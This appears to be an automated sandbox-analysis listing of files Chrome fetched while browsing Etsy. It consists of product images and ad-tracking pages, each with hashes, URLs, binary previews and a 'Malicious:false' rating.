                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......,.,.."........................................D.........................!1.AQ."aq..2....BR..#3br.$...%4..5CSTcd................................-......................!1..AQq2a."B...3.#r..............?...E.@*..d..,...B...*.P.1.J...5.P...;.....XR..`B..=.!@*..N.`.\.......]..\.o.`....!.4...G.?.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):78859
                                                                                                                                                                              Entropy (8bit):7.997191312282973
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1A5431B4F687D43BC3E9374F2CA8E8FB
                                                                                                                                                                              SHA1:8ED47C09312CC42CD25C21B84BF631CE68191E95
                                                                                                                                                                              SHA-256:F90EC1E3D2F5E1BDA4566DAA42C6DB65A52C62E71DF7147E61F3DEE60FAD2276
                                                                                                                                                                              SHA-512:80609C18A75151957B715BAF1B23D371005D5EDE98288CEAFB928BA04952AE7A43907AEDFEBFAB3262BF5345FE23835EFE53D2717B13AFA04AF0D95F876EE2CF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/40ceac/5973982368/iap_600x600.5973982368_sm1rod29.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................2....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................3.mdat.....&ey_.....2....p.E.Q@.../..}.[2'.T..mW...U.O..t...O9.........6........?........[{.y..>..f.r..0..g.r[..C.E..7...A....k.....m..^}...Z....$y8.q.!R..<...._..#y.s..i....+..ddN8....h..n.C...-.W.......~{......04}.%..."..#....(.Z=.] ..g\...b,)@.w.e....M.H..U=.4.....u*.f{...Yy..&.<............x. ..............k.D.Y.I%n=*'aT... .&.....|.].....3.:E..M.FtZ...{*.g...w)......G...JLR.z..*.].;..S.]....d....Yv....zp.u?M....}[yMi...\.$...7 .....PB.].. .a...vDC.....[i)..y.~/.@e...c....Pq..AeN.|.....u.Wi.ct%.f.A.?..y....Nb...}........=..&".Q.....3j)!T...0I.T..K.&..Z>G.......{Q9..6.*"...$.n..l..|.4..[.d...Sv..9.....r.N....;...\.gM./.r....o\.o..I.'.p.e8X..........t}T.D.&.....Ws.'....2...H..f..F^
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 58 x 69, 8-bit/color RGB, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                              Entropy (8bit):4.035372245524405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1CD201053F666499DD6B4A004BCA5D31
                                                                                                                                                                              SHA1:D5DDD66E64C5D25074CA04FE9855E533AACB47CE
                                                                                                                                                                              SHA-256:5FF334CF65D7A4BD91D4C14A23934E73619FCF95356DDECFDA0C2F1C0FD2820F
                                                                                                                                                                              SHA-512:71CFE15E0D7025DEE6A5405289CD65E791E261A1EC3A266C0837094527D0A3B9954BB88E1629026E5D0DFEBE1D1D4073A4FFC0CB3351A9724F19CBE0529598DA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d60712fcd3fe726/1729505264084/a23bz3A-xpA-I2G
                                                                                                                                                                              Preview:.PNG........IHDR...:...E.......bk....IDAT.....$.....IEND.B`.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):223
                                                                                                                                                                              Entropy (8bit):5.311677015965872
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:61BE0E1270DD68ABAA035BBE8EC9DD7D
                                                                                                                                                                              SHA1:3927A4D9A6C64E37996D74400ADACE6443472940
                                                                                                                                                                              SHA-256:52A1D0F52F460E327988C355867521B4DE4AF61472D94935AFB22DD20CFEA935
                                                                                                                                                                              SHA-512:36A8F049E4CD41DBDD3F1BD95B13A171F48B48821DD3863121D3851144E950800292F3349D0158681167FAB30EECED84376C2350B9D9CF70446469A56056821D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://d.agkn.com/iframe/10898/?che=1729505310&gauid=2035605285.1729505280
                                                                                                                                                                              Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>.<meta http-equiv="pragma" content="no-cache">.</head>.<body style="border: 0; margin: 0; padding: 0;">.</body>.</html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):37345
                                                                                                                                                                              Entropy (8bit):7.992656304740887
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3E4C86A8612B1412EDF42AF2638697EC
                                                                                                                                                                              SHA1:EBBF2CB0FAB17F9DEF379309447E63FDC4EEF8CB
                                                                                                                                                                              SHA-256:080CD908C2DC58410EA7AC9245CAF5B8E29EF3A2F8A900C4CC79D9D2C0EFE059
                                                                                                                                                                              SHA-512:2582B12786D3D6D5A5C195C329461D0FC2ECD6A9B2FDB4299E09CA8C2AEF3F84821538158AF2207680567ECA9AA40311B8DC29DD7860E8874CB6D39C79A05CC4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/17719287/r/il/411e0a/2504474000/il_600x600.2504474000_3nqj.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2........!@..tah.s9.r.....F...\..T..^4..C.l..>1.Hy....Q..k.4W..q.:k0.!.i.J.;<.2....)..^.\....d..._.*..)..T....z.5..q..#..`1[..-.]......)..N.v.zY.....e9as=.q.........;...V..x.=..g......z..}.5..^.2.,"+.S8..9s~i.B' u-...\..;...jN|,.8...yM{....!....\.'g.'[..t....A]...".z.n.ig..VA.zP](>.]-....gQ....1...=...rR.%)..T.Ow....eA....O.A.w.g.A..B.cq...-q.8d.*.+.`}.@.X.M.f.;..}*YI\...z.$P.G..l:....{6..8B....Zsu2.L.;..H..}Z.[.^.....*.....d...._b...?.{..r..Fv.d,y..GI..(v. m....t..0.Vr.T..v....j.}J...ep..?..!;...4............O}a.s}.<'..8U..gK.z..7Pb.:.+...+....0!*6.A.....D.e33....;.;dD..8...0)].k.5.q..~.2P9.....*-oc....k.f..V. u.t..~.<_..G.5.....(....z..+...s.. ...:.}..L.R....'
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):48054
                                                                                                                                                                              Entropy (8bit):7.995033481738017
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:78608CD089E61912819355E06ACAABD3
                                                                                                                                                                              SHA1:9A582726F8DB4637C4AA3012F81079F58A3E80BB
                                                                                                                                                                              SHA-256:06E3476D461BAA97AF898EA69FB2A47BC102D2C3C74378884E5BEE4CC7068CAA
                                                                                                                                                                              SHA-512:5F88BAE6E8846F1285EB7C4FAFBD5F2C356D9AE5F02BB800B10B2562547126757554E4737C13FE2E8B641B5F8D1EF7FECA99D1F8CC46364513D53F7E96F1D834
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/25837545/c/1400/1400/0/0/il/9f65be/6273831468/il_600x600.6273831468_meai.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2...Dd.a..P.....N...J.d.#..........~.|.\'.7,.......R.z.@..d..I....g....yh.k..p8...[.g7.ZM........Ct.:t...]F......N.s$...NaOYl..6i3.v....6...,...N..#..P.c...Q..W.. %..{...h.......>.W..PJ..'..'..k.._*`.....(..I.i..Y~.Y...q~.X.?^..c'......H...........'m..g.<...h.g..Y..[...85..M.e...z..[Hc.H........v....tna..N..Ul....z...-+.b./.....7..v4..}......2.@.A......E] '.?\{.aN..H..3\.....vB...\.EnL:..kQ.....5i{.p4.p..9.0.}.=.....y.r..4.v@.Y....+oV........l....k..._..c}...>y.%.:..>......1.2...../.z.cC. ..=.....k..... ..........7{x..k....F... .4...%..^.....{.mw......._..`..,TY..b.......zt.;.4.t...j..f.3.5.^...$.).t..:....2W~..a.....7.).~.i.....h....h...eTP.&...(.k].;..L.FI.y.b:..D.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1194
                                                                                                                                                                              Entropy (8bit):7.795855029912735
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5C44414CB72AF9A623551B40452EFFBC
                                                                                                                                                                              SHA1:46F35C5DCF0462F5434DB581409E38501A892CF7
                                                                                                                                                                              SHA-256:2C9769AF2A134E1B9E4F471D7477C7B21DB1C4A1844845942172A1DD9B8FB84F
                                                                                                                                                                              SHA-512:3FA306267654E1E92D2551ED04D65474B0E1A7FB59F3EC0AD199DB6210918C83372905D4EADFEEB1B27CCA239E1CF0AD1BEE76D750EFD7DE331CFA9A84A168A4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/16759523/c/3000/2384/0/333/il/188247/3225477297/il_100x100.3225477297_52ud.jpg
                                                                                                                                                                              Preview:RIFF....WEBPVP8 ....p!...*d.d.>U&.E#.!...8.D..eVQ.`....>eT{'.7..e.L....M..Q.....#.+.............9...Y.b2?q....d+..TH.>>.....cX.. IX..Q...m..J..!hGJ..|5.p.q.e.E.e...~...;.(g..e..8>...J..b... ..34..6U.....A.=.(Xv.9.a....L.).U...x..?..>.+...J,.!'...2.,3..G..}........?iW..[7...L.......N'Av4#...[.$g...W.".......H.$f..jg.z.. !e..\..!.Cc.......9.~)...,....q..L...1.%.[.....$Qp.|I.0Lt...>.h.P......J..m.........d].a.W.a...V.$.(<G...?.h.5.c.........G.y..N...7......a.........I.....g...d.|j.w...h.H..c.....GZ).Y.F.f..#.E-...aG...n......i.2...v..F.mPlE..w0.$.?c{YY.#j.....q.~u..\y..2O......[.............L....M..i ....2@s..I.88.&B...._..:..H.?k.Ee..Fr/._.,.p....z..~......>?..T....5K.k..d.|@...4..i.T.O.v.....r..5.....(..2.P.s. ...a.Z...eThf....e..ky.1..RJ.]...%.B.8A...X?..e.j.. .eS2...H.......{.?.7..kJ7:..9.l./..KF.{..m.....R.......).m..e..2...{....y.k.......p...O.[..`?..D...I_at.Kqmp.o.....?-RB:........$...7.;.....~........0..d..q..t4....m.8...x..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4243
                                                                                                                                                                              Entropy (8bit):7.621759408288254
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B734E4A5FFC9B2AE6F7ED9FA39693061
                                                                                                                                                                              SHA1:7FBE53B84BA1D5DC7C3B2D3854A991FE1E7AF58C
                                                                                                                                                                              SHA-256:3756D4D3B526A9643CE066F35B2A823B462B117C2568219DBEE237E09BF5A365
                                                                                                                                                                              SHA-512:FC7632CA6E74A04228C16A670640A8DF09F9D8833AC39622E46043026CC5C5AED9C77CE1C0AE24ACE04122EB41E3AF53EFFE5400F4367B2D75BB2281AD75953E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......d.d..".........................................B..........................!1."AQ.2a....Bbqr...3CR.....#$D..S..................................,......................!1..Q"Aq..23Ba...r..............?....g..S.......toCxt..Q.E09.T.Q.....g.H..H.S.5..;..:..2....*[......4..cy.@T.}%.{..k.7....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):104127
                                                                                                                                                                              Entropy (8bit):7.9789238128737985
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9E42B4DDF4E19AC29E2880ED263F55CE
                                                                                                                                                                              SHA1:4D9B63793477DA72D3BA2B00A06A5B8424C1C735
                                                                                                                                                                              SHA-256:CA648016B8073E7DED52C40123E4293AC0F9F405DDF422AE8B0824F3520A7D78
                                                                                                                                                                              SHA-512:92BD464855BFDF0F8A1F6581E4FBAC39B14708E598E4AD994A7EE16CC9894826F89E546D2FB1603F613CB049C818F0F4E0FF7751DBAB6ADD2839A691DA6CCDE3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................J.........................!.1AQ.."aq2.#B...R....3b....$Cr...S...%4.&Dcd.s.................................@......................!..1.AQaq."...2...B..#Rr..3b..4C...$Ss..............?...........*..:.%d..%.9.%...n...Z.l/utpT.L..aN.u..6#..K.....?.& u
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):41058
                                                                                                                                                                              Entropy (8bit):7.985270429376029
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3CDB896186241FF0DA74433D0CCEEBF1
                                                                                                                                                                              SHA1:94F0B1BDF906FF6E9621DA27CD0C44D6C75E4FBF
                                                                                                                                                                              SHA-256:333C7AC3E2C5DE9156A26B4136AA5AA7DDA25FB49305449CC5AE4BC58E24B1E6
                                                                                                                                                                              SHA-512:2D1A0A223CB28C3E4EAB59DEA0A3A0483595544B609221323638061591BEA0775EF2DD047861A004F7434F6EB3C5E6293F6DF1BC9F75EBE6CEA97BD6D06FB91D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/6763085/r/il/e47290/3290405028/il_600x600.3290405028_frnr.jpg
                                                                                                                                                                              Preview:RIFFZ...WEBPVP8X.... ...W..W..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 (...p....*X.X.>U&.F#.')'... ..gn.....9.)....7Y.Wd.......w.~..........'cS......>~.....t(._....'.wT......W.~....._.?...._...?...........E....k..1..~.....".1...s...~c.k.y.c..........|.uD..'./:...W~..../....@>.............'....0.n..we'.......?.k.{6...*.".h..V....6..w?..L/..\..3.E7...".U....=.}zZ2..I5..J.Kq.&<C.MA..6^....Q.V.[.\..}35t[...R..%Z..1..n....!i ....>G..u..v9K...]S.,....5}Y2...hwh...d.c.>...P*...s....Hg....N.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (6682), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):6682
                                                                                                                                                                              Entropy (8bit):5.641764704303987
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:76CD388DD220E8694116E6DF3476C327
                                                                                                                                                                              SHA1:D22D16E0F0E7366D69B440F4FC1C1BE5C7081E2F
                                                                                                                                                                              SHA-256:F7756C786D34CC00E8D276F2AE79E8381FF12C729BE3B059CF0F05E9E675DC62
                                                                                                                                                                              SHA-512:865A8126896B1FDCF23F54A9D5255B19CACFDABEEB865A7AFAA5CC447D3375137D00D81B889FEF6B596C4B669FC445D6517BB3209DBA6A8C07F25C30F0793137
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_000;ord=1;num=6682741059329;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=224793749;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
                                                                                                                                                                              Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":46656000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"1j627963196","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=1j627963196\u0026ig_key=1sMWo2Mjc5NjMxOTY!2sad4SEg!3sAAptDV6AKvT3","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1sUlFZYg!2sad4SEg!3sAAptDV6AKvT3"],"userBiddingSignals":[null,null,1729505298812027],"ads":[{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/dv3?xfa_adg_id=167413405199\u0026xfa_ads_id=590594853\u0026xfa_cr_id=704040673152\u0026xfa_cv_
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):97150
                                                                                                                                                                              Entropy (8bit):7.9979545225068325
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9EE05E42CC18241BE2F3BFB05FB50914
                                                                                                                                                                              SHA1:75038E1AF5E95E5445F0F0D8B2FD54A5B730EB79
                                                                                                                                                                              SHA-256:26BA24C175DE0ADABFEC2AE576AB6E153B5CE7D31A6C7C41C81BD58E2A0FF43E
                                                                                                                                                                              SHA-512:6D935CF921C7D0A8FB9B019D90ECDC46089E2524D3FB104CCB372C45C8DAEB03A8565BF25486A5295EEBDD7EAFE54F31CE134B58FF13105CC62975BE8F67E8C9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/6560530/c/2250/2250/0/444/il/e7ac59/2054431755/il_600x600.2054431755_gng3.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................zp...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................zxmdat.....&ey_.....2.... ...A@..60.;...Py..\Neeb.......H...b.?@..Wz...,n...ES.H3,WU.AI.>%.....MX..&...{c$.m.t3m...v.....{.f.j2.u..uV........f3.m0.e..5.........7y..(..c.T*|..r-0'9.v.L...<f..q..EE......"J...^....fI2.*.N:1'.n...M.....!iw...7. ,.2...x.......V%o..E;...Q.\.3ox.@..J.Of2FH.6._.$...6(.E.'..).Hs.......e{.U..D.\..=f...W..B.Y..~......h.....C....+.7._..J:.Q...xE.Hx$.~...D....i..I|..ux.....ne..X.Q..O...T..b.<.=..$....`.fJ.4..b.d6..V.Y.e'..x7{.sLO?....T6b.}..-...p.g.....\.lj..(.....oa....&.....u.Vd.A......(....i#..)k..9.#}.sD....*.....s(....Gv...2k...0P.O.s..._.FZT......d7...j...Z.....8..1.(..#Z.u:f.?.2n......s].s.....Z$.BV..w......y....A\b....6.<..j][..1.?=.9.9.|..7.@..tQ....~.+.3F...7.I.u
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):32932
                                                                                                                                                                              Entropy (8bit):7.991821053833428
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:EF1CC2EF210A6B0C49840A1DB4885230
                                                                                                                                                                              SHA1:6ECE2D90FAF788F296BF1A59282B31515BB7349F
                                                                                                                                                                              SHA-256:15A8522D084CB6D0F92FEC5D15393ED5D70FBE5EBDA8F3B5CD1062BE3C8BDFDA
                                                                                                                                                                              SHA-512:49835BF4565543F55EFB3E3B845B49E609F17C6D80E8342CB589DE2CC9E266BC8E6D43E96B781D8CD0FA63C20626209F48C617D050B65064906B55FB27C5342C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/8774385/r/il/b1c913/565518272/il_600x600.565518272_kfem.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2.... ...A@...yv...7.........7.#f.A...7p.6.-.-....-#\1$.o2Dmb.......n.t...l.W.........B.-...$.H.<o.........<.K.,!+.......=.i.N#%{..).s.Z..(c.\%A`...I.....O>.jJ....m.%....7...Ijv..IJ..|y..M<.....i....{..p..5...u..j}...p...&...D.... .....t......s...5N.{.z.ce..1p.W....D^.hi..\q3.]....WT...2.$J....5..X.....d....(.g^.,....E.0.-.........=\....cg.9....Q.......z.....W. .p..f.z..-L.k.P?...qX...H..A@d....xe)..x/.R:*.5&./J.....}2sFQ.|.+...0.1.Ve....4..M..G........._?...ixa...|\ .5WO......7...R.]MdfX.5...~.i..y(..".O;.0..yI........'.j|5:qv..*EB.sG..>+..{._..+.(.+.......34.J.i...g...7.w.sc4...y....]8.WC.....~...V......0..CD...P....LS.d.w/.V.....E..>..6W..VN.\ K...)..|..p%..a..T.(..u.>R.F9.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):52385
                                                                                                                                                                              Entropy (8bit):7.995343369826028
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:CB725E094CDF3523009A27BB157B348C
                                                                                                                                                                              SHA1:DA14F53606355DD1B357171DF9C325E9357CD514
                                                                                                                                                                              SHA-256:22A0A25EC3F57E587402C8591904DA7CBCFC8BAEFC0709B06B38F9B8E50D88C8
                                                                                                                                                                              SHA-512:617BFA2555C641D27A14ED5C443E437FE4AFBF3D2A0636311874C74F5D645D0525C58D0581B670F5E907CA8A07C8A40F54B25A21CE09104036787FF9F4625857
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18859311/r/il/78d735/4041114367/il_600x600.4041114367_obsj.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................mdat.....&ey_.....2........!@...DNmO....!9..Z...v"JKH.9..#?...~.b.jm.H^...._.i<....3..3'H.F...... .B..;.|...2..F.CsS....%^.S@.-lU.`LzM.T....%..!.fo.........].~..{..6..C._F.E.(y....u.}.Xm.o....Q!A.h.v..q.,Wv[....V...9."@^......%..`/().CA..K....z....EJk...\l...*..>.e..[{Y\|.....!t~.U.!..."5...F......JX.y.]!'xl.[.1Z.].`).{+x....U..x...$7Z...I."?.<gnG3...h42,"..V..v...s..4...6......8..^..4.._"........S...Pm.+m.>e..4)%o.E........,..2....tQ..%..B...&......o._.u.Q.....]..@.]AmT..do....o_O.Q.......D. .:.l....U.....z..E......~eRA...]..G..K..u...L.h4.........yi.|(i&rqg.L~...1R...TN/..g..9:....c...Br.......@&...O....g."..-61..a!..dg.L.>....Q..4....C\...J..{. ........,....zz.Y}..^{s7....<..o
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):81503
                                                                                                                                                                              Entropy (8bit):7.997130382749244
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6373A797FDDAAA01552806CB4C82D567
                                                                                                                                                                              SHA1:9384ADA03234C76FF00C347A24B469B9997DD6D3
                                                                                                                                                                              SHA-256:460596C2ED654A1D93E5B36F998168BD541EBED7991E3656B85764EC5C7A9DCE
                                                                                                                                                                              SHA-512:74F3A94591D840907B6B2F3D469E50A698364EA6605FE5F00E38442F0B808C12506814BAF298649D52F75F09C05FDE453F5E0D87BDE7DD4C986E08B47F3C504A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/f1fb34/5479418874/iap_600x600.5479418874_jr1mxc9u.jpg?version=0
